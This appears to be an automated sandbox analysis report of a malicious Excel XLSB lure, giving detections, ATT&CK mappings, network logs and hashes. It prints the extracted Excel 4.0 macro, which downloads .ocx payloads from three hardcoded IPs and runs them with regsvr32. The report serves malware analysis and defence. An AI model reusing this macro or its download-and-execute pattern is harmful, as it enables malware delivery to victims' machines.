Windows Analysis Report ClaimCopy-46148734-12012021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found protected and hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | Code function: | 0_2_02E966E8 | |
Source: | Code function: | 0_2_02E966F3 | |
Source: | Code function: | 0_2_02E96340 | |
Source: | Code function: | 0_2_02E96743 | |
Source: | Code function: | 0_2_02E96753 | |
Source: | Code function: | 0_2_02E9CF01 |
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Code function: | 0_2_02E966E8 |
Source: | Code function: | 0_2_02E966E8 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Process Injection2 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection2 | NTDS | File and Directory Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | System Information Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | ReversingLabs | Document-Excel.Downloader.EncDoc |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
94.140.114.63 | unknown | Latvia | 43513 | NANO-ASLV | false | |
146.19.170.39 | unknown | France | 7726 | FITC-ASUS | false | |
185.106.123.73 | unknown | Netherlands | 60117 | HSAE | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532405 |
Start date: | 02.12.2021 |
Start time: | 08:21:11 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ClaimCopy-46148734-12012021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 14 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
08:25:14 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
94.140.114.63 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
146.19.170.39 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
185.106.123.73 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HSAE | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
NANO-ASLV | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
FITC-ASUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
Encrypted: | false |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98319 |
Entropy (8bit): | 7.829516708837839 |
Encrypted: | false |
SSDEEP: | 1536:sB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUdvgJT:bc6EehCfCZpUHKGXbBKsiix |
MD5: | 109A55D7849B3834E28D9B6C6DEC942E |
SHA1: | 48A7BFC52B4DD1FD830D4FA450EB499084A954DD |
SHA-256: | 135ADD4D95F6069C03E719C8B7190794FCF9A72A7D7147217E233346556C04A1 |
SHA-512: | 261393EEBBA20E96B130FF171925493F29F9286EF5D43EDE6C6189EF4C47F57C4D14DCD9A6B2E0672DD645FB7B4A6DAC2F55267E9945AAFC7782090B8FF148A3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98319 |
Entropy (8bit): | 7.829516708837839 |
Encrypted: | false |
SSDEEP: | 1536:sB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUdvgJT:bc6EehCfCZpUHKGXbBKsiix |
MD5: | 109A55D7849B3834E28D9B6C6DEC942E |
SHA1: | 48A7BFC52B4DD1FD830D4FA450EB499084A954DD |
SHA-256: | 135ADD4D95F6069C03E719C8B7190794FCF9A72A7D7147217E233346556C04A1 |
SHA-512: | 261393EEBBA20E96B130FF171925493F29F9286EF5D43EDE6C6189EF4C47F57C4D14DCD9A6B2E0672DD645FB7B4A6DAC2F55267E9945AAFC7782090B8FF148A3 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.829986417947683 |
TrID: |
|
File name: | ClaimCopy-46148734-12012021.xlsb |
File size: | 98558 |
MD5: | f1107ae8c76f3ac6c7691fa5a857b206 |
SHA1: | b69597b25562a96547402d9bcadc096a340b8a69 |
SHA256: | 85278a1649ffd17dae84fce72827f804b0091b907efd841ac95f6b4644fd8d5a |
SHA512: | c861360e6f69811f7e4be22885e58e0c233ee409f83ee560e796e4038024d49c5675bde2c2cab45df5dcd94ee83324fac47b5aefd0835327e1a8af17e41f26ef |
SSDEEP: | 1536:whNB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU3Tds:O0c6EehCfCZpUHKGXbBKsiiCds |
File Content Preview: | PK..........!..]j.....R.......[Content_Types].xml ...(.....................................................................................................................................FF.................................................................. |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-46148734-12012021.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0) 9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0) 10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0) 11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0) 12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0) 13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0) 15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx") 16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx") 17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx") 18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx") 19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx") 20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx") 23,6,=HALT()
16,3,uRl 17,3,="Mon" 18,3,="URLDownloadTo" 19,3,="JJCCBB" 20,4,185.106.123.73/ 21,4,146.19.170.39/ 21,6,=RANDBETWEEN(142536473,988879789754) 22,4,94.140.114.63/ 22,6,=".dat" 23,4,94.140.114.63/ 23,6,=".dat2" 24,4,185.106.123.73/ 24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9) 25,4,146.19.170.39/ 37,6,=GOTO(Tiposa1!G8)
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-08:22:02.281420 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:02.281462 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:08.529732 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:21.359317 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:26.313483 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:30.295440 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:41.648286 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
12/02/21-08:24:09.205154 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:15.511167 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:29.247078 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:32.918862 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:35.960823 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:48.200067 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 08:21:59.245469093 CET | 49165 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:02.250252962 CET | 49165 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:08.256751060 CET | 49165 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:20.272634029 CET | 49166 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:23.281136990 CET | 49166 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:29.287617922 CET | 49166 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:41.348845005 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.408149958 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:22:41.408358097 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.409698963 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.468642950 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:22:41.648286104 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:22:41.648520947 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.678699970 CET | 49168 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:22:44.686182976 CET | 49168 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:22:50.692778111 CET | 49168 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:02.708092928 CET | 49169 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:05.716710091 CET | 49169 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:11.723367929 CET | 49169 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:23.750586987 CET | 49170 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:26.763032913 CET | 49170 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:32.769552946 CET | 49170 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:44.784657001 CET | 49171 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:46.652292967 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:23:46.652539968 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:23:47.793701887 CET | 49171 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:50.789545059 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:23:50.848592997 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:23:53.800252914 CET | 49171 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:24:05.851381063 CET | 49173 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:08.855582952 CET | 49173 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:14.862256050 CET | 49173 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:26.877198935 CET | 49174 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:29.886161089 CET | 49174 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:35.892690897 CET | 49174 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:47.901475906 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:24:47.960593939 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:24:47.960725069 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:24:47.961788893 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:24:48.020816088 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:24:48.200067043 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:24:48.200364113 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:25:53.208133936 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:25:53.208262920 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 146.19.170.39 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 08:22:41.409698963 CET | 1 | OUT | |
Dec 2, 2021 08:22:41.648286104 CET | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49175 | 146.19.170.39 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 08:24:47.961788893 CET | 4 | OUT | |
Dec 2, 2021 08:24:48.200067043 CET | 5 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 08:22:13 |
Start date: | 02/12/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f970000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:05 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:05 |
Start date: | 02/12/2021 |
